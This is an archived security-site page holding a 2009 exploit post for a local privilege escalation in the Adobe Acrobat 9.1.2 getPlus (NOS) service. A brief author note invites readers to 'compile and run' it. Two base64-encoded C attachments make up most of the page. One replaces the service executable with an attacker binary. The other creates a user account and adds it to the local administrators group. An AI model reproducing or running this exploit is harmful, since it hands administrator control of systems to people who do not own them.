TUCoPS :: Windows Apps :: bt-21329.htm

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit



--001636c59909102820046f3d7eb7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit

This exploit is based on the brief information provided by
Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). 

Exploiting improper permissions is fun.

A few notes are in order though. The getPlus service (that I tested,
via 9.1.2) isn't installed as an "Automatic" service, therefore making
it slightly harder (but not hard) to practically use to your
advantage. But I tested running this code under a GUEST account and it
worked pretty good (just the first time though). Change the values as
needed, compile and run.

Things could be more or less silent, lethal or non-lethal... it is
completely up to you. Things cannot get much simpler than this :)

Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's
download manager, then updated).

--001636c59909102820046f3d7eb7
Content-Type: text/x-csrc; charset=US-ASCII; name="alwaysdirtyneverclean.c"
Content-Disposition: attachment; filename="alwaysdirtyneverclean.c"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fxf3vnfg0

LyoNCmFsd2F5c2RpcnR5bmV2ZXJjbGVhbi5jDQpBS0ENCkFkb2JlIEFjcm9iYXQgOS4xLjIgTk9T
IExvY2FsIFByaXZpbGVnZSBFc2NhbGF0aW9uIEV4cGxvaXQgKGFsd2F5c2RpcnR5bmV2ZXJjbGVh
bi56aXApDQpCWQ0KSmVyZW15IEJyb3duIDIwMDkgWzB4amJyb3duNDFAZ21haWwuY29tXSAwNy4y
MS4yMDA5DQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
Kg0KSSd2ZSBiZWVuIHVwIGZvciBuZWFybHkgMjQgaG91cnMgKG9ubHkgdGhlIGxhc3QgZmV3IGRv
aW5nIHJlc2VhcmNoIHRob3VnaCkuIFRoaXMgZXhwbG9pdCBpcyBiYXNlZCBvbiB0aGUNCmJyaWVm
IGluZm9ybWF0aW9uIHByb3ZpZGVkIGJ5IE5pbmU6U2l0dWF0aW9uczpHcm91cCAoaHR0cDovL3d3
dy5taWx3MHJtLmNvbS9leHBsb2l0cy85MTk5KS4gRXhwbG9pdGluZw0KaW1wcm9wZXIgcGVybWlz
c2lvbnMgaXMgZnVuLiBBIGZldyBub3RlcyBhcmUgaW4gb3JkZXIgdGhvdWdoLiBUaGUgZ2V0UGx1
cyBzZXJ2aWNlICh0aGF0IEkgdGVzdGVkLCB2aWEgOS4xLjIpDQppc24ndCBpbnN0YWxsZWQgYXMg
YW4gIkF1dG9tYXRpYyIgc2VydmljZSwgdGhlcmVmb3JlIG1ha2luZyBpdCBzbGlnaHRseSBoYXJk
ZXIgKGJ1dCBub3QgaGFyZCkgdG8gcHJhY3RpY2FsbHkNCnVzZSB0byB5b3VyIGFkdmFudGFnZS4g
QnV0IEkgdGVzdGVkIHJ1bm5pbmcgdGhpcyBjb2RlIHVuZGVyIGEgR1VFU1QgYWNjb3VudCBhbmQg
aXQgd29ya2VkIHByZXR0eSBnb29kIChqdXN0DQp0aGUgZmlyc3QgdGltZSB0aG91Z2gpLiBDaGFu
Z2UgdGhlIHZhbHVlcyBhcyBuZWVkZWQsIGNvbXBpbGUgYW5kIHJ1bi4gVGhpbmdzIGNvdWxkIGJl
IG1vcmUgb3IgbGVzcyBzaWxlbnQsDQpsZXRoYWwgb3Igbm9uLWxldGhhbC4uLiBpdCBpcyBjb21w
bGV0ZWx5IHVwIHRvIHlvdS4gVGhpbmdzIGNhbm5vdCBnZXQgbXVjaCBzaW1wbGVyIHRoYW4gdGhp
cyA6KQ0KDQpUZXN0ZWQgb24gV2luZG93cyBYUCBTUDMgKyBBZG9iZSBBY3JvYmF0IDkuMS4yIChp
bnN0YWxsZWQgZnJvbSBhZG9iZSdzIGRvd25sb2FkIG1hbmFnZXIsIHRoZW4gdXBkYXRlZCkNCg0K
QnV0IG1heWJlIGdpdmUgQWRvYmUgYSBicmVhaz8gMjAwOSBoYXMgYmVlbiBhIHJvdWdoIHllYXIg
Zm9yIHRoZW0gYWxyZWFkeSwgaGVoLiBTbGVlcCB0aW1lLg0KKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCmFsd2F5c2RpcnR5bmV2ZXJjbGVhbi5jDQoq
Lw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDx3aW5kb3dzLmg+DQoNCiNkZWZpbmUg
REVGQVVMVF9UQVJHRVQgICJDOlxcUHJvZ3JhbSBGaWxlc1xcTk9TXFxiaW5cXEdldFBsdXNfSGVs
cGVyU3ZjLmV4ZSINCiNkZWZpbmUgREVGQVVMVF9CQUNLVVAgICJDOlxcUHJvZ3JhbSBGaWxlc1xc
Tk9TXFxiaW5cXEdldFBsdXNfSGVscGVyU3ZjLmV4ZS5iYWsiDQojZGVmaW5lIERFRkFVTFRfRVhF
Q1VURSAiQzpcXERvY3VtZW50cyBhbmQgU2V0dGluZ3NcXEFsbCBVc2Vyc1xcRG9jdW1lbnRzXFxi
aW4uZXhlIg0KLy8jZGVmaW5lIERFRkFVTFRfRVhFQ1VURSAiQzpcXFdJTkRPV1NcXHN5c3RlbTMy
XFxjYWxjLmV4ZSINCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCg0KICAg
ICBNb3ZlRmlsZShERUZBVUxUX1RBUkdFVCwgREVGQVVMVF9CQUNLVVApOw0KICAgICBDb3B5Rmls
ZShERUZBVUxUX0VYRUNVVEUsIERFRkFVTFRfVEFSR0VULCBGQUxTRSk7DQogICAgIC8vIHNoYWtl
ZSBhbmQgYmFrZWVlDQoNCiAgICAgcmV0dXJuIDA7DQoNCn0NCg=--001636c59909102820046f3d7eb7
Content-Type: text/x-csrc; charset=US-ASCII; name="bin.c"
Content-Disposition: attachment; filename="bin.c"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fxf3w33f1

LyoNCmJpbi5jDQpGUk9NDQpBZG9iZSBBY3JvYmF0IDkuMS4yIE5PUyBMb2NhbCBQcml2aWxlZ2Ug
RXNjYWxhdGlvbiBFeHBsb2l0IChhbHdheXNkaXJ0eW5ldmVyY2xlYW4uemlwKQ0KQlkNCkplcmVt
eSBCcm93biAyMDA5IFsweGpicm93bjQxQGdtYWlsLmNvbV0gMDcuMjEuMjAwOQ0KKi8NCg0KI2lu
Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8d2luZG93cy5oPg0KDQojZGVmaW5lIENNRCAiQzpc
XFdJTkRPV1NcXHN5c3RlbTMyXFxjbWQuZXhlIg0KI2RlZmluZSBPTkUgIi9DIG5ldCB1c2VyIGFk
b2JlIHB3bmVkIC9hZGQiDQojZGVmaW5lIFRXTyAiL0MgbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3Ry
YXRvcnMgYWRvYmUgL2FkZCINCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsN
Cg0KU1RBUlRVUElORk8gc2kgPSB7c2l6ZW9mKFNUQVJUVVBJTkZPKX07DQpQUk9DRVNTX0lORk9S
TUFUSU9OIHBpOw0KDQogICAgIENyZWF0ZVByb2Nlc3MoQ01ELCBPTkUsIE5VTEwsIE5VTEwsIDAs
IDAsIE5VTEwsIE5VTEwsICZzaSwgJnBpKTsNCiAgICAgQ3JlYXRlUHJvY2VzcyhDTUQsIFRXTywg
TlVMTCwgTlVMTCwgMCwgMCwgTlVMTCwgTlVMTCwgJnNpLCAmcGkpOw0KICAgICAvLyBtbW1tbW1t
bW1tbS4uIGNob2NvbGF0ZSBicm93aWUgaWNlIGNyZWFtIHNtb290aGVzIGFyZSBnb29vb29kDQoN
CiAgICAgcmV0dXJuIDA7DQoNCn0NCg=--001636c59909102820046f3d7eb7--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH